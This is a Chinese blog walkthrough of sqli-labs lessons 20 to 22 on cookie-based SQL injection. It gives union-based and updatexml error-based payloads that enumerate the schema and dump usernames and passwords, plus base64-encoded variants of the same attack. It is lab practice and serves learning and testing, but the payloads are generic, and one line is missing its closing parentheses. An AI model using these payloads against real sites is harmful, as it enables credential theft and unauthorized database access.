Less-20

登陆成功后,出现cookie,登陆失败会显示失败信息

登陆成功后,后台将usename放入cookie中,再次登陆时候只要是cookie没过期,就会去cookie里面取值,然后进行查询

 

 

可以使用chrom里面的cookie-editer,使用burpsuite抓包

方法一union联合查询:
Cookie: uname=admi’ order by 3#

 

 当order by x后为3时,不报错,当x为4时,报错,说明栏位为3

查库  Cookie: uname=admi’ union select 1,2,database()#

 

 查表 Cookie: uname='union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'#

 

 查列  uname=adm' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'#

 

 查字段  uname=adm' union select 1,2,group_concat(concat_ws('-',username,password))from security.users#

 

 

 方法二,报错型注入

查库  Cookie: uname=adm' or updatexml(1,concat(0x7e,database(),0x7e),1)#

 

 

查表  Cookie: uname=adm' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
查列  Cookie: uname=adm' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' #
查字段  Cookie:uname=adm' or updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1)#

 

Less-21

 

输入密码登陆后,可以看到cookie: uname被加密

 

 百度搜索Base64就可以解决,推荐网址https://base64.us/

 

 查表 uname=')union select 1,2,database()#

 

 

 

 除了多了一步编码,其他步骤均与第20关类似

 

Less-22

通过编码测试发现,这一关的包裹是双引号

uname="union select 1,2,database()#

解码为InVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM=

其他步骤均与第21关相同

 

 posted on 2020-02-22 11:23  骑着七彩祥云的少年  阅读(383)  评论(0编辑  收藏  举报